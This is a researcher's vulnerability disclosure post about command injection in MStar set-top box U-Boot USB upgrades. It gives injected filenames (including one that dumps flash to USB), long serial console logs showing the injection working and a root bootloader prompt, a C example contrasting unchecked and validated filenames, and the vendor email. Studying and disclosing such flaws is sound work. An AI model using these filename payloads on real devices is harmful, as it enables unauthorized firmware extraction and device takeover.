Ivan Marković

Security consultant and researcher

Long experience in designing and implementing security solutions, mainly oriented towards web, mobile and embedded applications. Author of penetration testing tools recognized by the OWASP organization and the BackTrack Linux distribution. Research work includes the discovery of vulnerabilities in numerous applications and services, for which the author received public acknowledgement from Microsoft.

Contact via LinkedIn or read interesting stuff on Twitter.

Command injections via USB upgrade in MSTAR Set-Top box products

27.04.2018

While I was working on a diagnostic device for some of my clients, I found command injections in MSTAR Set-Top box products. The diagnostic device does not specifically target this vendor, but we used these boxes during the development phase and for testing. The vulnerable functionality is the automatic USB upgrade process: it is possible to inject additional commands via malicious file names.

For example, to upgrade your Set-Top box, you just need to put the firmware file on a USB drive with the filename "auto_upgrade.bin"; after you insert it and restart the device, it will be upgraded automatically. This functionality can also be exploited by inserting additional commands into the filename, since the name ends up on a U-Boot command line. One of the first names I tried was "auto_upgrade.bin;help", and the serial console output confirms that the command injection works:

2017-02-13 18:48:51	U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 18:48:51	
2017-02-13 18:48:51	Board: MSTAR KRITI (CPU Speed 576 MHz)
2017-02-13 18:48:51	DRAM:  64 X 0 MBytes
2017-02-13 18:48:51	U-Boot is running at DRAM 0x87610000
2017-02-13 18:48:51	Module: USB FAT FLASH SPI LOGO OSD ENV=SERIAL 
2017-02-13 18:48:51	Flash is detected (0x0C02, 0xC8, 0x40, 0x16)
2017-02-13 18:48:51	In:    serial
2017-02-13 18:48:51	Out:   serial
2017-02-13 18:48:51	Err:   serial
2017-02-13 18:48:51	MSVC00B000100100208768TH0000000T
2017-02-13 18:48:51	MDrv_PNL_Init u32PnlRiuBaseAddr = BF200000
2017-02-13 18:48:51	MDrv_PNL_Init u32PMRiuBaseAddr = BF000000
2017-02-13 18:48:52	Panel Library mismatch(03), please update to version 04
2017-02-13 18:48:52	[_MDrv_PNL_Init_LPLL][305]pstPanelInitData->u16Width=1920, pstPanelInitData->u16Height=1080
2017-02-13 18:48:52	[_MDrv_PNL_Init_LPLL][307]u16HTotal=2640,u16VTotal=1125,pstPanelInitData->u16HTotal=2640,pstPanelInitData->u16VTotal=1125, u16DefaultVFreq=500
2017-02-13 18:48:52	[_MDrv_PNL_Init_Output_Dclk][350]pstPanelInitData->u16Width=1920, pstPanelInitData->u16Height=1080
2017-02-13 18:48:52	[_MDrv_PNL_Init_Output_Dclk][352]u16HTotal=2640,u16VTotal=1125,pstPanelInitData->u16HTotal=2640,pstPanelInitData->u16VTotal=1125, u16DefaultVFreq=500
2017-02-13 18:48:52	[XC,Version] 00442327
2017-02-13 18:48:52	 no need to patch
2017-02-13 18:48:52	DAC eTiming =6
2017-02-13 18:48:52	HDMITx eTiming =7
2017-02-13 18:48:52	HDMITx eTiming =7
2017-02-13 18:48:52	Create Dolby single part name task failed!!
2017-02-13 18:48:52	[Hal_VE_EnableDI][1430] bEnable = 0, bIsDNR2VE = 0
2017-02-13 18:48:52	u32ReadBuffVirAddr = A0000000, u32IntBuffVirAddr = A0100000, u32OutBuffVirAddr = A0730000
2017-02-13 18:48:52	verJPD_SetStatus >>>>>>>>>>> w:720,  h:576,  p:720
2017-02-13 18:48:52	
2017-02-13 18:48:52	[GOP3, PID 0, TID 0x-1][Driver Version]: 0089, BuildNum: 0002, ChangeList: 00524916
2017-02-13 18:48:52	 keypad_pressed is [0] 
2017-02-13 18:48:52	 ir_pressed is [0] 
2017-02-13 18:48:52	Hit any key to stop autoboot:  0 
2017-02-13 18:48:52	Check USB port[0]:
2017-02-13 18:48:53	Host type:2 
2017-02-13 18:48:53	scanning bus for devices... 1 USB Device(s) found
2017-02-13 18:48:53	       scanning bus for storage devices... bulk max packet size: ep 200 ep2 200
2017-02-13 18:48:53	usb_stor_Bulk_max_lun: 0 
2017-02-13 18:48:53	1 Storage Device(s) found
2017-02-13 18:48:53	reading auto_upgrade.bin
2017-02-13 18:48:53	
2017-02-13 18:48:53	** Unable to read "auto_upgrade.bin" from usb 0:1 **
2017-02-13 18:48:53	cmd fatload usb 0  80000000 auto_upgrade.bin 1 failed
2017-02-13 18:48:53	?       - alias for 'help'
2017-02-13 18:48:53	
2017-02-13 18:48:53	do Lzma for compress image
2017-02-13 18:48:53	
2017-02-13 18:48:53	autoboot   - Continue auto-boot flow
2017-02-13 18:48:53	
2017-02-13 18:48:53	base    - print or set address offset
2017-02-13 18:48:53	
2017-02-13 18:48:53	bdinfo  - print Board Info structure
2017-02-13 18:48:53	
2017-02-13 18:48:53	boot_logo - Logo display 
...
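The output above shows the upgrade load failing on the bare name and then the help listing being printed, i.e. the injected name was split into two U-Boot commands at the ";". The following C is an added example, not MStar's or U-Boot's code: it models that split and puts the unchecked pattern next to a hardened filename check. The fatload format string is approximated from the log line, and the 64-character bound and allowed alphabet are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model (not MStar's or U-Boot's code) of the upgrade step in
 * the log: the bootloader formats "fatload usb 0 80000000 <name>" from
 * usb_upgrade_path and hands it to the command interpreter, which treats
 * ';' as a command separator (format approximated from the log line). */
#define UPGRADE_FMT "fatload usb 0 80000000 %s"

/* Interpreter view: number of commands run for `cmdline` after the split
 * on ';' (quoting ignored, as in the simple U-Boot 1.1.6 parser). */
static int count_commands(const char *cmdline)
{
    int n = 1;
    for (const char *p = cmdline; *p; p++)
        if (*p == ';')
            n++;
    return n;
}

/* Vulnerable pattern: the name read from the stick is pasted into the
 * command line unchecked. Returns how many commands would execute. */
int commands_executed_for(const char *name)
{
    char cmd[256];
    int w = snprintf(cmd, sizeof cmd, UPGRADE_FMT, name);
    return (w < 0 || (size_t)w >= sizeof cmd) ? -1 : count_commands(cmd);
}

/* Hardened check: a conservative filename alphabet and a length bound, so
 * the value can never carry ';', whitespace or other interpreter syntax.
 * Returns 1 if `name` is acceptable, 0 otherwise (bound is an assumption). */
int upgrade_name_ok(const char *name)
{
    static const char allowed[] = "abcdefghijklmnopqrstuvwxyz"
                                  "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    size_t n = strlen(name);
    return n > 0 && n <= 64 && strspn(name, allowed) == n;
}

/* Hardened build: validate first, then format. Returns 0 on success and
 * fills `out`; -1 if the name is rejected or does not fit. */
int build_upgrade_cmd(const char *name, char *out, size_t len)
{
    if (!upgrade_name_ok(name))
        return -1;
    int w = snprintf(out, len, UPGRADE_FMT, name);
    return (w < 0 || (size_t)w >= len) ? -1 : 0;
}
```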

You can also chain your commands:

"auto_upgrade.bin;help;bdinfo;boot_logo;coninfo;fatinfo;printenv;version;.bin"

...
2017-02-13 18:49:57	ustar   - update kernal & root file system automatically by script file
2017-02-13 18:49:57	
2017-02-13 18:49:57	version - print monitor version
2017-02-13 18:49:57	
2017-02-13 18:49:57	boot_params = 0x877958E0
2017-02-13 18:49:57	memstart    = 0x80000000
2017-02-13 18:49:57	memsize     = 0x08000000
2017-02-13 18:49:57	flashstart  = 0xBFC00000
2017-02-13 18:49:57	flashsize   = 0x00800000
2017-02-13 18:49:57	flashoffset = 0x00000000
2017-02-13 18:49:57	ethaddr     =
2017-02-13 18:49:57	 00:00:00:00:00:00
2017-02-13 18:49:57	ip_addr     = 
2017-02-13 18:49:57	0.0.0.0
2017-02-13 18:49:57	
2017-02-13 18:49:57	baudrate    = 0 bps
2017-02-13 18:49:57	Usage:
2017-02-13 18:49:57	boot_logo - Logo display 
2017-02-13 18:49:57	
2017-02-13 18:49:57	List of available devices:
2017-02-13 18:49:57	
2017-02-13 18:49:57	serial   80000003 SIO stdin stdout stderr 
2017-02-13 18:49:57	usage: fatinfo  
2017-02-13 18:49:57	bootdelay=0
2017-02-13 18:49:57	baudrate=115200
2017-02-13 18:49:57	preboot=echo;echo Type "help" for more commands.
2017-02-13 18:49:57	MS_BOARD=BD_MST204A_D01A
2017-02-13 18:49:57	logo_cmd=boot_logo 0 0 1 1
2017-02-13 18:49:57	OAD_IN_MBOOT=1
2017-02-13 18:49:57	info_exchange=spi
2017-02-13 18:49:57	CUSTOMER_OUI=0x226D
2017-02-13 18:49:57	AP_SW_MODEL=0x0208
2017-02-13 18:49:57	HW_MODEL=0x2210
2017-02-13 18:49:57	HW_VERSION=0x0001
2017-02-13 18:49:57	CHIP_VERSION=U03
2017-02-13 18:49:58	BOARD_TYPE_SEL=0x0CFF
2017-02-13 18:49:58	BUILDCL=0xEAF49
2017-02-13 18:49:58	bootcmd=spi_rdc 0x80b00000 0x7001c 0x2ac77e; LzmaDec 0x80b00000 0x2ac77e 0x80000180 0x81000000; go 0x80000224;
2017-02-13 18:49:58	AP_SW_VERSION=0x0001
2017-02-13 18:49:58	usb_complete=0
2017-02-13 18:49:58	filesize=4
2017-02-13 18:49:58	panel_cmd=set_paneltype 12
2017-02-13 18:49:58	OAD_NEED_UPGRADE=0
2017-02-13 18:49:58	OAD_NEED_SCAN=0
2017-02-13 18:49:58	USBUpdateFlag=0
2017-02-13 18:49:58	usb_upgrade=1
2017-02-13 18:49:58	usb_upgrade_port=0
2017-02-13 18:49:58	partno=1
2017-02-13 18:49:58	usb_upgrade_path=auto_upgrade.bin;help;bdinfo;boot_logo;coninfo;fatinfo;printenv;version;.bin
2017-02-13 18:49:58	stdin=serial
2017-02-13 18:49:58	stdout=serial
2017-02-13 18:49:58	stderr=serial
2017-02-13 18:49:58	
2017-02-13 18:49:58	Environment size: 703/65532 bytes
2017-02-13 18:49:58	
2017-02-13 18:49:58	U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 18:49:58	start get
...

The serial console doesn't accept any input because "bootdelay=0", but with the command injection in the USB upgrade process we can find a way to reconfigure U-Boot and get root:

2017-02-13 19:11:25	BOOTSPI
2017-02-13 19:11:25	BIST0_OK
2017-02-13 19:11:25 	_OK!decomp
2017-02-13 19:11:25 	_done
2017-02-13 19:11:25	done
2017-02-13 19:11:25	
2017-02-13 19:11:25	Hello U-Boot
2017-02-13 19:11:25	
2017-02-13 19:11:25	U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 19:11:25	
2017-02-13 19:11:25	Board: MSTAR KRITI (CPU Speed 576 MHz)
2017-02-13 19:11:25	DRAM:  64 X 0 MBytes
2017-02-13 19:11:25	U-Boot is running at DRAM 0x87610000
2017-02-13 19:11:26	Module: USB FAT FLASH SPI LOGO OSD ENV=SERIAL 
2017-02-13 19:11:26	Flash is detected (0x0C02, 0xC8, 0x40, 0x16)
2017-02-13 19:11:26	In:    serial
2017-02-13 19:11:26	Out:   serial
2017-02-13 19:11:26	Err:   serial
...
2017-02-13 19:11:26 	keypad_pressed is [0] 
2017-02-13 19:11:26	 ir_pressed is [0]
...
2017-02-13 19:11:26	<< MStar >>#
...

I also tried to contact the vendor about this issue, but I didn't receive a response:

To: contact_europe@mstarsemi.com, security-alert@mstarsemi.com,
 secure@mstarsemi.com, security@mstarsemi.com, support@mstarsemi.com,
 info@mstarsemi.com
From: IM 
Subject: Command injection in Set-Top Box USB upgrade procedure
Message-ID: <8a9e4502-1963-1bae-3aeb-88e5a16699e4@security-net.biz>
Date: Fri, 27 Oct 2017 15:06:19 +0200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)
 Gecko/20100101 Thunderbird/52.4.0
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 7bit
Content-Language: en-US

Hello,

I'm working on a diagnostic device and during the testing I found a 
command injection in some of your products.
It is possible to inject additional commands via malicious file names, 
for example:

"auto_upgrade.bin;fatwrite usb 0 0xBFC00000 backup.bin 0x400000;"

I will publish these findings in my research paper about the device 
that I'm working on.
Please contact me if you want to arrange coordinated disclosure or if 
you need more details.

Best regards,
Ivan Markovic
https://security-net.biz/

You can download a longer serial console dump here: CoolTerm-Capture-2017-02-13.txt
GitHub: Command injections via USB upgrade in MSTAR Set Top box